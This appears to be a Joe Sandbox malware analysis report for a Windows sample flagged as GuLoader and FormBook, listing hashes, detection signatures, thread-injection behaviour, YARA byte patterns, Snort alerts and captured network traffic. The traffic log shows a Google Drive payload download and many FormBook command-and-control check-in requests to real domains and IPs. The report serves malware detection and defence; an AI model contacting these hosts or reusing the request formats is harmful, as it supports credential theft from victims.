Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ulACwpUCSU.exe

Overview

General Information

Sample name:ulACwpUCSU.exe
Analysis ID:1451688
MD5:b6f8b1c89399490857facfcf5bb78d86
SHA1:898e59e55c027c47833f435fff28ed20da9ecdc8
SHA256:c4c7ed9360322bf463828c0e86a131a081ecc700fe32dc0215d392251771a6de
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • ulACwpUCSU.exe (PID: 8608 cmdline: "C:\Users\user\Desktop\ulACwpUCSU.exe" MD5: B6F8B1C89399490857FACFCF5BB78D86)
    • ulACwpUCSU.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\ulACwpUCSU.exe" MD5: B6F8B1C89399490857FACFCF5BB78D86)
      • eUbiubZkrHdFTtCYB.exe (PID: 868 cmdline: "C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runonce.exe (PID: 3444 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 7430CCC7226A6FF76B6D55B96F6CE53C)
          • eUbiubZkrHdFTtCYB.exe (PID: 7152 cmdline: "C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1204 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 8 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:06/04/24-14:37:17.421441
        SID:2855465
        Source Port:49834
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:39:57.709410
        SID:2855465
        Source Port:49879
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:35:10.111073
        SID:2855465
        Source Port:49802
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:35:51.616479
        SID:2855465
        Source Port:49814
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:41:09.241153
        SID:2855465
        Source Port:49888
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:34:54.577597
        SID:2855465
        Source Port:49798
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:38:09.145692
        SID:2855465
        Source Port:49847
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:41:37.239459
        SID:2855465
        Source Port:49893
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:37:31.388113
        SID:2855465
        Source Port:49838
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:42:10.001607
        SID:2855465
        Source Port:49899
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:40:58.461569
        SID:2855465
        Source Port:49887
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:41:25.629315
        SID:2855465
        Source Port:49891
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:35:37.881933
        SID:2855465
        Source Port:49810
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:41:48.028067
        SID:2855465
        Source Port:49895
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:41:53.435539
        SID:2855465
        Source Port:49897
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:36:33.301646
        SID:2855465
        Source Port:49826
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:37:03.609123
        SID:2855465
        Source Port:49830
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:38:00.679065
        SID:2855465
        Source Port:49846
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:35:24.278240
        SID:2855465
        Source Port:49806
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:36:19.073798
        SID:2855465
        Source Port:49822
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:41:20.072336
        SID:2855465
        Source Port:49890
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:38:50.305812
        SID:2855465
        Source Port:49859
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:39:03.630338
        SID:2855465
        Source Port:49863
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:40:43.956228
        SID:2855465
        Source Port:49883
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:41:14.601763
        SID:2855465
        Source Port:49889
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:41:31.000835
        SID:2855465
        Source Port:49892
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:38:22.421737
        SID:2855465
        Source Port:49851
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:34:31.075062
        SID:2855465
        Source Port:49794
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:39:30.783165
        SID:2855465
        Source Port:49871
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:42:04.181429
        SID:2855465
        Source Port:49898
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:39:44.071584
        SID:2855465
        Source Port:49875
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:37:45.221573
        SID:2855465
        Source Port:49842
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:38:36.478189
        SID:2855465
        Source Port:49855
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:41:42.655120
        SID:2855465
        Source Port:49894
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:36:05.512490
        SID:2855465
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:06/04/24-14:39:17.115878
        SID:2855465
        Source Port:49867
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: ulACwpUCSU.exeAvira: detected
        Antivirus detection for URL or domain
        Source: www.barrettdigitalart.comSophos S4: Label: malware callhome domain
        Source: http://www.barrettdigitalart.com/a8pp/Sophos S4: Label: malware callhome domain
        Source: http://www.barrettdigitalart.com/a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppLSophos S4: Label: malware callhome domain
        Multi AV Scanner detection for submitted file
        Source: ulACwpUCSU.exeReversingLabs: Detection: 65%
        Source: ulACwpUCSU.exeVirustotal: Detection: 35%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Machine Learning detection for sample
        Source: ulACwpUCSU.exeJoe Sandbox ML: detected
        Source: ulACwpUCSU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.217.174:443 -> 192.168.11.30:49792 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.217.193:443 -> 192.168.11.30:49793 version: TLS 1.2
        Source: ulACwpUCSU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: runonce.pdbGCTL source: ulACwpUCSU.exe, 00000003.00000003.2981655894.00000000075B6000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: ulACwpUCSU.exe, 00000003.00000003.2919856507.0000000037365000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: ulACwpUCSU.exe, ulACwpUCSU.exe, 00000003.00000003.2919856507.0000000037365000.00000004.00000020.00020000.00000000.sdmp, runonce.exe
        Source: Binary string: mshtml.pdbUGP source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: runonce.pdb source: ulACwpUCSU.exe, 00000003.00000003.2981655894.00000000075B6000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_0040603A FindFirstFileA,FindClose,0_2_0040603A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_004055F6 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055F6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0310BA90 FindFirstFileW,FindNextFileW,FindClose,5_2_0310BA90
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 4x nop then xor eax, eax5_2_030F9440
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 4x nop then pop edi5_2_03101F80
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 4x nop then pop edi5_2_030FDCB1

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49794 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49798 -> 34.120.137.41:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49802 -> 160.124.114.188:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49806 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49810 -> 172.67.205.56:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49814 -> 162.0.237.22:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49818 -> 64.190.62.22:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49822 -> 23.227.38.74:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49826 -> 217.70.184.50:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49830 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49834 -> 23.82.12.29:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49838 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49842 -> 162.240.81.18:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49846 -> 192.207.62.21:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49847 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49851 -> 34.120.137.41:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49855 -> 160.124.114.188:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49859 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49863 -> 172.67.205.56:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49867 -> 162.0.237.22:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49871 -> 64.190.62.22:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49875 -> 23.227.38.74:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49879 -> 217.70.184.50:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49883 -> 192.207.62.21:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49887 -> 85.159.66.93:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49888 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49889 -> 34.120.137.41:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49890 -> 160.124.114.188:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49891 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49892 -> 172.67.205.56:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49893 -> 162.0.237.22:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49894 -> 64.190.62.22:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49895 -> 23.227.38.74:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49897 -> 217.70.184.50:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49898 -> 104.194.9.31:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49899 -> 104.21.63.61:80
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.astralavenue.xyz
        Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
        Source: Joe Sandbox ViewIP Address: 162.0.237.22 162.0.237.22
        Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
        Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=17gm-wgqB94fKwcr7ZsHzQiLhRxM6222H&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=/NPZ6ym1eSqP6E/qwOmQvYjKsz7zkRsccrcByesNZAVEstX0SolnWK8jgzxt8MISaNzEdIb6rnMbXZkqzFIAORFEfuZ8IH0a3kCasVRTZJxsOlTMl/y3o9s=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.peptily.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.blissfulbooks.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=Dft4chLLB7HQRgI1kvQb3UGdiigcwJaJso3MJc+IJoTJW0I2amM0Xj+YeLw4jIoNvtXY/7GemIMI+dXc5vnp9QE1cggkijBoQvQelzZ8ig3DEoIcGDshdqY=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.click-advertising.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=eXj7agnwQ7UtDQTI2/QeRjNOKmxKRYHEwlq+kXNt3DleoKuUYGucHmIzSo9PpxNipdSpHjsdoNiIZ3Hh69GYDO27Wp3lPM6WDcDlV706K5XwonPjk8UKoRY=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.continentaloilandgas.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.barrettdigitalart.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=Au5imsmV21JYiQqAtZZYW5jQMTc/TsZAtUnDsMKbX4YoEplVSL6Rm/9dTWFSyViTXIIw8p1ls4ghLUagt/HJKO94HieJHgrJIyAOML3UnsK6ear2OzXGe/M=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.astralavenue.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=ZUQ1TL0seNvx54VLi4j8goKVXeEHsH3HvniJXC80qaRkGy2/Bav7bR6THbfzZ3GDEHeASBxbKXGg0EinUgac1wLiet4LPvLUzSGHrF52u0MP0A2xTBnpXUY=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.nurse-job2535.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.shootprecious.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.cyberpsychsecurity.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
